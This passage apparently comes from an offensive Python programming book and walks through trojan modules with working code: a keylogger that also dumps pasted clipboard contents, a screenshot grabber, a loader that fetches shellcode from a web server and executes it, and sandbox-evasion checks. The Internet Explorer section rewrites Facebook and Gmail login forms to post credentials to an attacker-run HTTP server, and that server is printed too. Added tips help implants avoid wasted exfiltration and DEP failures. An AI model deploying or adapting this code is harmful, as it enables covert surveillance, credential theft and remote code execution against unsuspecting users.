➎   length = user32.GetWindowTextA(hwnd, byref(window_title),512)

    # print out the header if we're in the right process
    print
➏   print "[ PID: %s - %s - %s ]" % (process_id, executable.value, window_title.value)
    print

    # close the process handle (an HWND is a window handle, not a kernel
    # object handle, so it is not closed with CloseHandle)
    kernel32.CloseHandle(h_process)
All right! So we just put in some helper variables and a function that will capture the active window and its associated process ID. We first call GetForegroundWindow ➊, which returns a handle to the active window on the target’s desktop. Next we pass that handle to the GetWindowThreadProcessId ➋ function to retrieve the window’s process ID. We then open the process ➌ and, using the resulting process handle, we find the actual executable name ➍ of the process. The final step is to grab the full text of the window’s title bar using the GetWindowTextA ➎ function. At the end of our helper function we output all of the information ➏ in a nice header so that you can clearly see which keystrokes went with which process and window. Now let’s put the meat of our keystroke logger in place to finish it off.
def KeyStroke(event):

    global current_window

    # check to see if target changed windows
➊   if event.WindowName != current_window:
        current_window = event.WindowName
        get_current_process()

    # if they pressed a standard key
➋   if event.Ascii > 32 and event.Ascii < 127:
        print chr(event.Ascii),
    else:
        # if [Ctrl-V], get the value on the clipboard
➌       if event.Key == "V":
            win32clipboard.OpenClipboard()
            pasted_value = win32clipboard.GetClipboardData()
            win32clipboard.CloseClipboard()

            print "[PASTE] - %s" % (pasted_value),
        else:
            print "[%s]" % event.Key,

    # pass execution to next hook registered
    return True

# create and register a hook manager
➍ kl = pyHook.HookManager()
➎ kl.KeyDown = KeyStroke

# register the hook and execute forever
➏ kl.HookKeyboard()
pythoncom.PumpMessages()
That’s all you need! We define our PyHook HookManager ➍ and then bind the KeyDown event to our user-defined callback function KeyStroke ➎. We then instruct PyHook to hook all keypresses ➏ and continue execution. Whenever the target presses a key on the keyboard, our KeyStroke function is called with an event object as its only parameter. The first thing we do is check if the user has changed windows ➊ and if so, we acquire the new window’s name and process information. We then look at the keystroke that was issued ➋ and if it falls within the ASCII-printable range, we simply print it out. If it’s a modifier (such as the SHIFT, CTRL, or ALT keys) or any other nonstandard key, we grab the key name from the event object. We also check if the user is performing a paste operation ➌, and if so we dump the contents of the clipboard. The callback function wraps up by returning True to allow the next hook in the chain — if there is one — to process the event. Let’s take it for a spin!

Kicking the Tires
It’s easy to test our keylogger. Simply run it, and then start using Windows normally. Try using your web browser, calculator, or any other application, and view the results in your terminal. The output below is going to look a little off, which is only due to the formatting in the book.
C:\> python keylogger-hook.py
[ PID: 3836 - cmd.exe - C:\WINDOWS\system32\cmd.exe -
c:\Python27\python.exe key logger-hook.py ]
t e s t
[ PID: 120 - IEXPLORE.EXE - Bing - Microsoft Internet Explorer ]
w w w . n o s t a r c h . c o m [Return]
[ PID: 3836 - cmd.exe - C:\WINDOWS\system32\cmd.exe -
c:\Python27\python.exe keylogger-hook.py ]
[Lwin] r
[ PID: 1944 - Explorer.EXE - Run ]
c a l c [Return]
[ PID: 2848 - calc.exe - Calculator ]
➊ [Lshift] + 1 =
You can see that I typed the word test into the main window where the keylogger script ran. I then fired up Internet Explorer, browsed to www.nostarch.com, and ran some other applications. We can now safely say that our keylogger can be added to our bag of trojaning tricks! Let’s move on to taking screenshots.

Taking Screenshots
Most pieces of malware and penetration testing frameworks include the capability to take screenshots against the remote target. This can help capture images, video frames, or other sensitive data that you might not see with a packet capture or keylogger. Thankfully, we can use the PyWin32 package (see Installing the Prerequisites) to make native calls to the Windows API to grab them.
A screenshot grabber will use the Windows Graphics Device Interface (GDI) to determine necessary properties such as the total screen size, and to grab the image. Some screenshot software will only grab a picture of the currently active window or application, but in our case we want the entire screen. Let’s get started. Crack open screenshotter.py and drop in the following code:
import win32gui
import win32ui
import win32con
import win32api
# grab a handle to the main desktop window
➊ hdesktop = win32gui.GetDesktopWindow()
# determine the size of all monitors in pixels
➋ width = win32api.GetSystemMetrics(win32con.SM_CXVIRTUALSCREEN)
height = win32api.GetSystemMetrics(win32con.SM_CYVIRTUALSCREEN)
left = win32api.GetSystemMetrics(win32con.SM_XVIRTUALSCREEN)
top = win32api.GetSystemMetrics(win32con.SM_YVIRTUALSCREEN)
# create a device context
➌ desktop_dc = win32gui.GetWindowDC(hdesktop)
img_dc = win32ui.CreateDCFromHandle(desktop_dc)
# create a memory based device context
➍ mem_dc = img_dc.CreateCompatibleDC()
# create a bitmap object
➎ screenshot = win32ui.CreateBitmap()
screenshot.CreateCompatibleBitmap(img_dc, width, height)
mem_dc.SelectObject(screenshot)
# copy the screen into our memory device context
➏ mem_dc.BitBlt((0, 0), (width, height), img_dc, (left, top), win32con.SRCCOPY)
➐ # save the bitmap to a file
screenshot.SaveBitmapFile(mem_dc, 'c:\\WINDOWS\\Temp\\screenshot.bmp')
# free our objects
mem_dc.DeleteDC()
win32gui.DeleteObject(screenshot.GetHandle())
Let's review what this little script does. First we acquire a handle to the entire desktop ➊, which includes the entire viewable area across multiple monitors. We then determine the size of the screen(s) ➋ so that we know the dimensions required for the screenshot. We create a device context [18] using the GetWindowDC ➌ function call and pass in a handle to our desktop. Next we need to create a memory-based device context ➍ where we will store our image capture until we write the bitmap bytes to a file. We then create a bitmap object ➎ that is compatible with the device context of our desktop. The SelectObject call then sets the memory-based device context to point at the bitmap object that we're capturing into. We use the BitBlt ➏ function to take a bit-for-bit copy of the desktop image and store it in the memory-based context. Think of this as a memcpy call for GDI objects. The final step is to dump this image to disk ➐. This script is easy to test: just run it from the command line and check the C:\WINDOWS\Temp directory for your screenshot.bmp file.

Two practical notes before you build this into a trojan. If you turn the script into a loop that captures repeatedly, pair each GetWindowDC with win32gui.ReleaseDC(hdesktop, desktop_dc) so you don't leak device contexts. And BitBlt copies whatever the interactive desktop currently shows: from a locked workstation, or from a non-interactive session such as a service, you get a black image rather than an error, so check what you captured before you bother exfiltrating it. Let's move on to executing shellcode.
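Before moving on, here is a check on the file the script writes, added here as an example and not part of the book's code. A BMP from SaveBitmapFile can be the right size yet entirely black, which is what BitBlt produces against a locked workstation or from a non-interactive session, so an implant that ships screenshots blindly spends bandwidth on empty images. The parser below reads the two headers Windows writes, compares the dimensions with the virtual-screen size, and measures how much of the image is black. build_bmp() exists only to fabricate constructed test images offline; the 98 percent cutoff and the function names are this example's assumptions.

```python
import struct

# Constructed test data only: build_bmp() fabricates a small bottom-up 24-bit
# BMP laid out the way Windows writes one (14-byte file header, 40-byte
# BITMAPINFOHEADER, pixel rows padded to 4 bytes) so the parser can run
# without a Windows box. pixel_fn(x, y) returns an (r, g, b) tuple.
def build_bmp(width, height, pixel_fn):
    row_bytes = (width * 3 + 3) & ~3
    rows = []
    for y in range(height):
        row = bytearray()
        for x in range(width):
            r, g, b = pixel_fn(x, y)
            row += bytes((b, g, r))            # BMP stores channels as BGR
        row += b"\x00" * (row_bytes - width * 3)
        rows.append(bytes(row))
    pixels = b"".join(rows)
    info = struct.pack("<IiiHHIIiiII", 40, width, height, 1, 24, 0,
                       len(pixels), 2835, 2835, 0, 0)
    header = struct.pack("<2sIHHI", b"BM", 14 + 40 + len(pixels), 0, 0, 14 + 40)
    return header + info + pixels


def parse_bmp(data):
    """Read BITMAPFILEHEADER and BITMAPINFOHEADER; uncompressed 24/32 bpp only."""
    magic, _, _, _, offset = struct.unpack_from("<2sIHHI", data, 0)
    if magic != b"BM":
        raise ValueError("not a BMP file")
    _, width, height, _, bpp, compression = struct.unpack_from("<IiiHHI", data, 14)
    if compression != 0 or bpp not in (24, 32):
        raise ValueError("unsupported BMP: %d bpp, compression %d" % (bpp, compression))
    # a negative height means a top-down bitmap; row order does not matter here
    return {"width": width, "height": abs(height), "bpp": bpp, "offset": offset}


def dark_fraction(data, threshold=16):
    """Fraction of pixels whose brightest channel is below threshold."""
    info = parse_bmp(data)
    bytes_per_pixel = info["bpp"] // 8
    row_bytes = (info["width"] * bytes_per_pixel + 3) & ~3
    dark = 0
    for y in range(info["height"]):
        row = info["offset"] + y * row_bytes
        for x in range(info["width"]):
            start = row + x * bytes_per_pixel
            b, g, r = data[start:start + 3]
            if max(r, g, b) < threshold:
                dark += 1
    return dark / float(info["width"] * info["height"])


def capture_is_usable(data, expected_width, expected_height, max_dark=0.98):
    """True when the file matches the virtual-screen size and is not (nearly) all black."""
    info = parse_bmp(data)
    if (info["width"], info["height"]) != (expected_width, expected_height):
        return False
    return dark_fraction(data) < max_dark


if __name__ == "__main__":
    black = build_bmp(8, 4, lambda x, y: (0, 0, 0))
    half = build_bmp(8, 4, lambda x, y: (255, 255, 255) if x < 4 else (0, 0, 0))
    print("all-black capture usable:", capture_is_usable(black, 8, 4))   # False
    print("half-lit capture usable:", capture_is_usable(half, 8, 4))     # True
```

On the Windows side you would read the file screenshotter.py wrote (open(r'c:\WINDOWS\Temp\screenshot.bmp', 'rb').read()) and pass the width and height you already computed from GetSystemMetrics; a False result is the cue to retry later rather than to send the file.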

Pythonic Shellcode Execution

There might come a time when you want to be able to interact with one of your target machines, or use a juicy new exploit module from your favorite penetration testing or exploit framework. This typically, though not always, requires some form of shellcode execution. In order to execute raw shellcode, we simply need to create a buffer in memory and, using the ctypes module, create a function pointer to that memory and call the function. In our case, we're going to use urllib2 to grab the shellcode from a web server in base64 format and then execute it. Let's get started! Open up shell_exec.py and enter the following code:
import urllib2
import ctypes
import base64

# retrieve the shellcode from our web server
url = "http://localhost:8000/shellcode.bin"
➊ response = urllib2.urlopen(url)

# decode the shellcode from base64
shellcode = base64.b64decode(response.read())

# create a buffer in memory
➋ shellcode_buffer = ctypes.create_string_buffer(shellcode, len(shellcode))

# create a function pointer to our shellcode
➌ shellcode_func = ctypes.cast(shellcode_buffer, ctypes.CFUNCTYPE(ctypes.c_void_p))

# call our shellcode
➍ shellcode_func()
How awesome is that? We kick it off by retrieving our base64-encoded shellcode from our web server ➊. We then allocate a buffer ➋ to hold the shellcode after we've decoded it. The ctypes cast function allows us to cast the buffer to act like a function pointer ➌ so that we can call our shellcode like we would call any normal Python function. We finish it up by calling our function pointer, which then causes the shellcode to execute ➍.

Two things to keep in mind before relying on this. create_string_buffer hands back ordinary heap memory, which Data Execution Prevention marks non-executable, so on a DEP-enabled system the call at ➍ fails with an access violation instead of running the payload; allocating the buffer with VirtualAlloc and PAGE_EXECUTE_READWRITE (or changing its protection with VirtualProtect) is the usual fix. And the script executes whatever the web server returns over plain HTTP, so anyone who can answer for that hostname gets code execution inside your implant; pin a hash of the expected shellcode, or fetch it over TLS.

Kicking the Tires

You can handcode some shellcode or use your favorite pentesting framework like CANVAS or Metasploit [19] to generate it for you. I picked some Windows x86 callback shellcode for CANVAS in my case. Whatever you pick, its architecture has to match the Python interpreter that will run shell_exec.py: a 32-bit Python 2.7 needs an x86 payload even on 64-bit Windows. Store the raw shellcode (not the string buffer!) in /tmp/shellcode.raw on your Linux machine and run the following:

justin$ base64 -i shellcode.raw > shellcode.bin
justin$ python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...

We simply base64-encoded the shellcode using the standard Linux command line. The next little trick uses the SimpleHTTPServer module to treat your current working directory (in our case, /tmp/) as its web root. Any requests for files will be served automatically for you. Now drop your shell_exec.py script in your Windows VM, change the url variable so it points at your Linux machine's IP address instead of localhost, and execute it. You should see the following in your Linux terminal:

192.168.112.130 - - [12/Jan/2014 21:36:30] "GET /shellcode.bin HTTP/1.1" 200 -

This indicates that your script has retrieved the shellcode from the simple web server that you set up using the SimpleHTTPServer module. If all goes well, you'll receive a shell back to your framework, and have popped calc.exe, or displayed a message box, or whatever your shellcode was compiled for.

Sandbox Detection

Increasingly, antivirus solutions employ some form of sandboxing to determine the behavior of suspicious specimens. Whether this sandbox runs on the network perimeter, which is becoming more popular, or on the target machine itself, we must do our best to avoid tipping our hand to any defense in place on the target's network. We can use a few indicators to try to determine whether our trojan is executing within a sandbox. We'll monitor our target machine for recent user input, including keystrokes and mouse-clicks. Then we'll add some basic intelligence to look for keystrokes, mouse-clicks, and double-clicks. Our script will also try to determine if the sandbox operator is sending input repeatedly (i.e., a suspicious rapid succession of continuous mouse-clicks) in order to try to respond to rudimentary sandbox detection methods. We'll compare the last time a user interacted with the machine versus how long the machine has been running, which should give us a good idea whether we are inside a sandbox or not. A typical machine has many interactions at some point during a day since it has been booted, whereas a sandbox environment usually has no user interaction because sandboxes are typically used as an automated malware analysis technique.

We can then make a determination as to whether we would like to continue executing or not. Let's start working on some sandbox detection code. Open sandbox_detect.py and throw in the following code:
import ctypes
import random
import time
import sys
user32 = ctypes.windll.user32
kernel32 = ctypes.windll.kernel32
keystrokes = 0
mouse_clicks = 0
double_clicks = 0
These are the main variables where we are going to track the total number of mouse-clicks, double-clicks, and keystrokes. Later, we'll look at the timing of the mouse events as well. Now let's create and test some code for detecting how long the system has been running and how long since the last user input. Add the following function to your sandbox_detect.py script:
class LASTINPUTINFO(ctypes.Structure):
    _fields_ = [("cbSize", ctypes.c_uint),
                ("dwTime", ctypes.c_ulong)
    ]

def get_last_input():
    struct_lastinputinfo = LASTINPUTINFO()
➊   struct_lastinputinfo.cbSize = ctypes.sizeof(LASTINPUTINFO)

    # get last input registered
➋   user32.GetLastInputInfo(ctypes.byref(struct_lastinputinfo))

    # now determine how long the machine has been running
➌   run_time = kernel32.GetTickCount()

    # both values are 32-bit millisecond counters that wrap every ~49.7 days,
    # so mask the difference instead of trusting a raw subtraction
    elapsed = (run_time - struct_lastinputinfo.dwTime) & 0xFFFFFFFF

    print "[*] It's been %d milliseconds since the last input event." % elapsed

    return elapsed

# TEST CODE REMOVE AFTER THIS PARAGRAPH!
➍ while True:
    get_last_input()
    time.sleep(1)
We define a LASTINPUTINFO structure that will hold the timestamp (in milliseconds since boot) of when the last input event was detected on the system. Do note that you have to initialize the cbSize ➊ variable to the size of the structure before making the call. We then call the GetLastInputInfo ➋ function, which populates our struct_lastinputinfo.dwTime field with the timestamp. The next step is to determine how long the system has been running by using the GetTickCount ➌ function call; subtracting the two gives the idle time. The last little snippet of code ➍ is simple test code where you can run the script and then move the mouse, or hit a key on the keyboard, and see this new piece of code in action.

Two details are worth knowing about these calls. GetTickCount is a 32-bit counter that wraps to zero after roughly 49.7 days of uptime, which is why the subtraction above is masked to 32 bits. And GetLastInputInfo only reports input for the session that makes the call, so an implant running as a service in Session 0 never sees the interactive user's activity and will always look idle.

We'll define thresholds for these user input values next. But first it's worth noting that the total running system time and the last detected user input event can also be relevant to your particular method of implantation. For example, if you know that you're only implanting using a phishing tactic, then it's likely that a user had to click or perform some operation to get infected. This means that within the last minute or two, you would see user input. If for some reason you see that the machine has been running for 10 minutes and the last detected input was 10 minutes ago, then you are likely inside a sandbox that has not processed any user input. These judgment calls are all part of having a good trojan that works consistently.

This same technique can be useful for polling the system to see if a user is idle or not, as you may only want to start taking screenshots when they are actively using the machine, and likewise, you may only want to transmit data or perform other tasks when the user appears to be offline. You could also, for example, model a user over time to determine what days and hours they are typically online.

Let's delete the last three lines of test code, and add some additional code to look at keystrokes and mouse-clicks. We'll use a pure ctypes solution this time as opposed to the PyHook method. You can easily use PyHook for this purpose as well, but having a couple of different tricks in your toolbox always helps, as each antivirus and sandboxing technology has its own ways of spotting these tricks. Let's get coding:
# GetAsyncKeyState returns a SHORT; tell ctypes so the -32767 comparison below is reliable
user32.GetAsyncKeyState.restype = ctypes.c_short

def get_key_press():
    global mouse_clicks
    global keystrokes

➊   for i in range(0,0xff):
➋       if user32.GetAsyncKeyState(i) == -32767:

            # 0x1 is the code for a left mouse-click
➌           if i == 0x1:
                mouse_clicks += 1
                return time.time()

➍           elif i > 32 and i < 127:
                keystrokes += 1

    return None
This simple function tells us the number of mouse-clicks, the time of the mouse-clicks, as well as how many keystrokes the target has issued. This works by iterating over the range of valid virtual-key codes ➊; for each key, we check whether the key has been pressed using the GetAsyncKeyState ➋ function call. The value -32767 (0x8001 as a signed 16-bit number) means the key is down right now and has also been pressed since the last time we asked about it. If the key is detected as being pressed, we check if it is 0x1 ➌, which is the virtual-key code for a left mouse-button click. We increment the total number of mouse-clicks and return the current timestamp so that we can perform timing calculations later on. We also check for virtual-key codes in the printable ASCII range ➍, which covers the digits and letters, and if so, we simply increment the total number of keystrokes detected. Because this polls rather than hooks, a key pressed and released between two passes of the loop can be missed; that is acceptable here because we only need a rough count. Now let's combine the results of these functions into our primary sandbox detection loop. Add the following code to sandbox_detect.py:
def detect_sandbox():
    global mouse_clicks
    global keystrokes

➊   max_keystrokes = random.randint(10,25)
    max_mouse_clicks = random.randint(5,25)

    double_clicks = 0
    max_double_clicks = 10
    double_click_threshold = 0.250 # in seconds
    first_double_click = None

    average_mousetime = 0
    max_input_threshold = 30000 # in milliseconds

    previous_timestamp = None
    detection_complete = False

➋   last_input = get_last_input()

    # if we hit our threshold let's bail out
    if last_input >= max_input_threshold:
        sys.exit(0)

    while not detection_complete:

➌       keypress_time = get_key_press()

        if keypress_time is not None and previous_timestamp is not None:

            # calculate the time between double clicks
➍           elapsed = keypress_time - previous_timestamp

            # the user double clicked
➎           if elapsed <= double_click_threshold:

                double_clicks += 1

                if first_double_click is None:

                    # grab the timestamp of the first double click
                    first_double_click = time.time()

                else:
➏                   if double_clicks == max_double_clicks:
➐                       if keypress_time - first_double_click <= (max_double_clicks * double_click_threshold):
                            sys.exit(0)

            # we are happy there's enough user input
➑           if keystrokes >= max_keystrokes and double_clicks >= max_double_clicks and mouse_clicks >= max_mouse_clicks:
                return

            previous_timestamp = keypress_time

        elif keypress_time is not None:
            previous_timestamp = keypress_time

detect_sandbox()
print "We are ok!"
All right. Be mindful of the indentation in the code blocks above! We start by defining some variables ➊ to track the timing of mouse-clicks, and some thresholds with regard to how many keystrokes or mouse-clicks we're happy with before considering ourselves running outside a sandbox. We randomize these thresholds with each run, but you can of course set thresholds of your own based on your own testing.

We then retrieve the elapsed time ➋ since some form of user input has been registered on the system, and if we feel that it's been too long since we've seen input (based on how the infection took place, as mentioned previously), we bail out and the trojan dies. Instead of dying here, you could also choose to do some innocuous activity such as reading random registry keys or checking files. After we pass this initial check, we move on to our primary keystroke and mouse-click detection loop.

We first check for keypresses or mouse-clicks ➌, and we know that if the function returns a value, it is the timestamp of when the mouse-click occurred. Next we calculate the time elapsed between mouse-clicks ➍ and then compare it to our threshold ➎ to determine whether it was a double-click. Along with double-click detection, we're looking to see if the sandbox operator has been streaming click events ➏ into the sandbox to try to fake out sandbox detection techniques. For example, it would be rather odd to see 100 double-clicks in a row during typical computer usage. If the maximum number of double-clicks has been reached and they happened in rapid succession ➐, we bail out. Our final step is to see if we have made it through all of the checks and reached our maximum number of clicks, keystrokes, and double-clicks ➑; if so, we break out of our sandbox detection function.

Note that the loop never sleeps and only returns once all three thresholds have been met, including ten double-clicks, so on a lightly used but perfectly real desktop the implant can spin at full CPU for a long time before it does anything else. A short time.sleep inside the loop and an overall timeout after which you decide one way or the other are sensible additions.

I encourage you to tweak and play with the settings, and to add additional features such as virtual machine detection. It might be worthwhile to track typical usage in terms of mouse-clicks, double-clicks, and keystrokes across a few computers that you own (I mean possess, not ones that you hacked into!) to see where you feel the happy spot is. Depending on your target, you may want more paranoid settings or you may not be concerned with sandbox detection at all. Using the tools that you developed in this chapter can act as a base layer of features to roll out in your trojan, and due to the modularity of our trojaning framework, you can choose to deploy any one of them.
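To make the decision logic testable away from a Windows VM, here is an added, offline model of the heuristics in sandbox_detect.py (example code, not the book's): the Win32 calls are replaced by the values you would read from GetTickCount() and LASTINPUTINFO.dwTime, the click timestamps are constructed sample streams, and the thresholds are fixed assumptions in place of the book's randomized ones. It also carries the wrap-safe tick subtraction. The names classify_activity, HUMAN_CLICKS and SCRIPTED_CLICKS belong to this example only.

```python
# Offline model of the sandbox_detect.py heuristics. Constructed inputs only;
# thresholds below are assumptions, not the book's random.randint() values.

TICK_WRAP = 1 << 32  # GetTickCount() is a 32-bit millisecond counter


def ms_since_last_input(tick_now, last_input_tick):
    """Wrap-safe version of run_time - dwTime: after ~49.7 days of uptime the
    tick count rolls over and a plain subtraction can go negative."""
    return (tick_now - last_input_tick) % TICK_WRAP


def double_click_times(click_times, threshold=0.25):
    """Timestamps of clicks that followed the previous click within threshold
    seconds; this is exactly what detect_sandbox() counts as a double-click."""
    doubles = []
    prev = None
    for t in click_times:
        if prev is not None and (t - prev) <= threshold:
            doubles.append(t)
        prev = t
    return doubles


def is_replayed_input(doubles, max_double_clicks=10, threshold=0.25):
    """The book's burst check: if the Nth double-click lands within
    N * threshold seconds of the first one, somebody is streaming clicks."""
    if len(doubles) < max_double_clicks:
        return False
    span = doubles[max_double_clicks - 1] - doubles[0]
    return span <= max_double_clicks * threshold


def classify_activity(tick_now, last_input_tick, click_times, keystrokes,
                      max_idle_ms=30000, min_keystrokes=10, min_clicks=5,
                      min_double_clicks=2, max_double_clicks=10,
                      threshold=0.25):
    """Return 'sandbox:idle', 'sandbox:replayed-clicks', 'undecided' or 'human'."""
    if ms_since_last_input(tick_now, last_input_tick) >= max_idle_ms:
        return "sandbox:idle"
    doubles = double_click_times(click_times, threshold)
    if is_replayed_input(doubles, max_double_clicks, threshold):
        return "sandbox:replayed-clicks"
    if (keystrokes < min_keystrokes or len(click_times) < min_clicks
            or len(doubles) < min_double_clicks):
        return "undecided"          # keep polling, as the book's loop does
    return "human"


# Constructed click streams (seconds since the implant started polling).
HUMAN_CLICKS = [0.0, 0.1, 2.0, 5.0, 5.2, 9.0, 12.5, 12.6, 16.0, 20.0]
SCRIPTED_CLICKS = [i * 0.1 for i in range(20)]   # 20 clicks, 100 ms apart


if __name__ == "__main__":
    now = 600000                      # ten minutes of uptime, in ms
    print(classify_activity(now, now - 10000, HUMAN_CLICKS, 40))      # human
    print(classify_activity(now, now - 60000, HUMAN_CLICKS, 40))      # sandbox:idle
    print(classify_activity(now, now - 1000, SCRIPTED_CLICKS, 40))    # sandbox:replayed-clicks
    print(classify_activity(now, now - 1000, HUMAN_CLICKS, 3))        # undecided
```

Feeding the function a recorded click stream from a machine you possess is the quickest way to calibrate min_double_clicks and the replay window before you trust the verdict on a target.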
[17] Download PyHook here: http://sourceforge.net/projects/pyhook/.

[18] To learn all about device contexts and GDI programming, visit the MSDN page here: http://msdn.microsoft.com/en-us/library/windows/desktop/dd183553(v=vs.85).aspx.

[19] As CANVAS is a commercial tool, take a look at this tutorial for generating Metasploit payloads here: http://www.offensive-security.com/metasploit-unleashed/Generating_Payloads.

Chapter 9. Fun with Internet Explorer

Windows COM automation serves a number of practical uses, from interacting with network-based services to embedding a Microsoft Excel spreadsheet into your own application. All versions of Windows from XP forward allow you to embed an Internet Explorer COM object into applications, and we'll take advantage of this ability in this chapter. Using the native IE automation object, we'll create a man-in-the-browser-style attack where we can steal credentials from a website while a user is interacting with it. We'll make this credential-stealing attack extendable, so that several target websites can be harvested. The last step will use Internet Explorer as a means to exfiltrate data from a target system. We'll include some public key crypto to protect the exfiltrated data so that only we can decrypt it.

Internet Explorer, you say? Even though other browsers like Google Chrome and Mozilla Firefox are more popular these days, most corporate environments still use Internet Explorer as their default browser. And of course, you can't remove Internet Explorer from a Windows system, so this technique should always be available to your Windows trojan.

Man-in-the-Browser (Kind Of)

Man-in-the-browser (MitB) attacks have been around since the turn of the new millennium. They are a variation on the classic man-in-the-middle attack. Instead of acting in the middle of a communication, malware installs itself and steals credentials or sensitive information from the unsuspecting target's browser. Most of these malware strains insert themselves into the browser (typically as Browser Helper Objects, the IE extension mechanism) or otherwise inject code so that they can manipulate the browser process itself. As browser developers become wise to these techniques and antivirus vendors increasingly look for this behavior, we have to get a bit sneakier. By leveraging the native COM interface to Internet Explorer, we can control any IE session in order to get credentials for social networking sites or email logins. You can of course extend this logic to change a user's password or perform transactions with their logged-in session. Depending on your target, you can also use this technique in conjunction with your keylogger module in order to force them to re-authenticate to a site while you capture the keystrokes.

We'll begin by creating a simple example that will watch for a user browsing Facebook or Gmail, de-authenticate them, and then modify the login form to send their username and password to an HTTP server that we control. Our HTTP server will then simply redirect them back to the real login page. If you've ever done any JavaScript development, you'll notice that the COM model for interacting with IE is very similar. We are picking on Facebook and Gmail because corporate users have a nasty habit of both reusing passwords and using these services for business (particularly, forwarding work mail to Gmail, using Facebook chat with coworkers, and so on). Let's crack open mitb.py and enter the following code:
import win32com.client
import time
import urlparse
import urllib

➊ data_receiver = "http://localhost:8080/"

➋ target_sites = {}
target_sites["www.facebook.com"] = {"logout_url"      : None,
                                    "logout_form"     : "logout_form",
                                    "login_form_index": 0,
                                    "owned"           : False}

target_sites["accounts.google.com"] = {"logout_url"      : "https://accounts.google.com/Logout?hl=en&continue=https://accounts.google.com/ServiceLogin%3Fservice%3Dmail",
                                       "logout_form"     : None,
                                       "login_form_index": 0,
                                       "owned"           : False}

# use the same target for multiple Gmail domains
target_sites["www.gmail.com"]   = target_sites["accounts.google.com"]
target_sites["mail.google.com"] = target_sites["accounts.google.com"]

clsid = '{9BA05972-F6A8-11CF-A442-00A0C90A8F39}'

➌ windows = win32com.client.Dispatch(clsid)
These are the makings of our man-(kind-of)-in-the-browser attack. We define our data_receiver variable ➊ as the web server that will receive the credentials from our target sites. This method is riskier in that a wily user might see the redirect happen, so as a future homework project you could think of ways of pulling cookies or pushing the stored credentials through the DOM via an image tag or other means that look less suspicious. We then set up a dictionary of target sites ➋ that our attack will support. The dictionary members are as follows: logout_url is a URL we can redirect to via a GET request to force a user to log out; logout_form is the ID of a DOM element that we can submit to force the logout; login_form_index is the index into the target page's forms collection of the login form we'll modify; and the owned flag tells us if we have already captured credentials from a target site, because we don't want to keep forcing the user to log in repeatedly or else the target might suspect something is up. We then use the class ID of the ShellWindows object and instantiate it via COM ➌, which gives us access to all tabs and instances of Internet Explorer that are currently running. (The same collection also lists open Windows Explorer windows, whose location is a file path rather than a URL, which is why the loop below matches on the hostname instead of assuming every entry is a web page.)

Now that we have the support structure in place, let's create the main loop of our attack:
while True:
➊   for browser in windows:
        url = urlparse.urlparse(browser.LocationUrl)

➋       if url.hostname in target_sites:

➌           if target_sites[url.hostname]["owned"]:
                continue

            # if there is a URL, we can just redirect
➍           if target_sites[url.hostname]["logout_url"]:
                browser.Navigate(target_sites[url.hostname]["logout_url"])
                wait_for_browser(browser)
            else:
                # retrieve all elements in the document
➎               full_doc = browser.Document.all

                # iterate, looking for the logout form
                for i in full_doc:
                    try:
                        # find the logout form and submit it
➏                       if i.id == target_sites[url.hostname]["logout_form"]:
                            i.submit()
                            wait_for_browser(browser)
                    except:
                        pass

            # now we modify the login form
            try:
                login_index = target_sites[url.hostname]["login_form_index"]
                login_page  = urllib.quote(browser.LocationUrl)
➐               browser.Document.forms[login_index].action = "%s%s" % (data_receiver, login_page)
                target_sites[url.hostname]["owned"] = True
            except:
                pass

    time.sleep(5)
This is our primary loop where we monitor our target's browser session for the sites from which we want to nab credentials. We start by iterating through all currently running Internet Explorer objects ➊; this includes active tabs in modern IE. If we discover that the target is visiting one of our predefined sites ➋, we can begin the main logic of our attack. The first step is to determine whether we have executed an attack against this site already ➌; if so, we won't execute it again. (This has a downside in that if the user didn't enter their password correctly, you can miss their credentials; I'll leave our simplified solution as a homework assignment to improve upon.)

We then test to see if the target site has a simple logout URL that we can redirect to ➍ and if so, we force the browser to do so. If the target site (such as Facebook) requires the user to submit a form to force the logout, we begin iterating over the DOM ➎ and when we discover the HTML element ID that is registered to the logout form ➏, we force the form to be submitted. After the user has been redirected to the login form, we modify the action of the form so that it posts the username and password to a server that we control ➐, and then wait for the user to perform a login. Notice that we tack the URL-encoded address of the login page onto the end of the URL of our HTTP server that collects the credentials. This is so our HTTP server knows where to redirect the browser after collecting the credentials. Be aware that rewriting the action from https to a plain http URL sends the credentials across the wire in cleartext, and IE may warn the user about submitting form data over an unencrypted connection; for anything beyond a lab test you would put TLS on data_receiver.

You'll notice the function wait_for_browser referenced in a few spots above, which is a simple function that waits for a browser to complete an operation such as navigating to a new page or loading a page fully. Let's add this functionality now by inserting the following code above the main loop of our script:
def wait_for_browser(browser):
    # wait for the browser to finish loading a page
    while browser.ReadyState != 4 and browser.ReadyState != "complete":
        time.sleep(0.1)
    return
Pretty simple. We are just looking for the DOM to be fully loaded before allowing the rest of our script to keep executing. This allows us to carefully time any DOM modifications or parsing operations.

Creating the Server

Now that we've set up our attack script, let's create a very simple HTTP server to collect the credentials as they're submitted. Crack open a new file called cred_server.py and drop in the following code:
import SimpleHTTPServer
import SocketServer
import urllib

class CredRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
    def do_POST(self):
➊       content_length = int(self.headers['Content-Length'])
➋       creds = self.rfile.read(content_length).decode('utf-8')
➌       print creds
➍       site = self.path[1:]
        self.send_response(301)
➎       self.send_header('Location',urllib.unquote(site))
        self.end_headers()

➏ server = SocketServer.TCPServer(('0.0.0.0', 8080), CredRequestHandler)
server.serve_forever()
This simple snippet of code is our specially designed HTTP server. We initialize the base TCPServer class with the IP, port, and CredRequestHandler class ➏ that will be responsible for handling the HTTP POST requests. When our server receives a request from the target's browser, we read the Content-Length header ➊ to determine the size of the request body, and then we read in the contents of the request ➋ and print them out ➌. We then pull the originating login page (Facebook, Gmail, etc.) out of the request path ➍ and force the target browser to redirect ➎ back to that page on the target site. An additional feature you could add here is to send yourself an email every time credentials are received so that you can attempt to log in using the target's credentials before they have a chance to change their password.

Because the handler inherits from SimpleHTTPRequestHandler, any GET request is still answered by serving files from the directory you started the script in, and the Location header is built from whatever path the client sent, so treat this as a throwaway test listener rather than something to expose on the Internet. Let's take it for a spin.

Kicking the Tires

Fire up a new IE instance and run your mitb.py and cred_server.py scripts in separate windows. You can test browsing around to various websites first to make sure that you aren't seeing any odd behavior, which you shouldn't. Now browse to Facebook or Gmail and attempt to log in. In your cred_server.py window, you should see something like the following, using Facebook as an example:

C:\>python.exe cred_server.py
lsd=AVog7IRe&email=justin@nostarch.com&pass=pyth0nrocks&default_persistent=0&timezone=180&lgnrnd=200229_SsTf&lgnjs=1394593356&locale=en_US
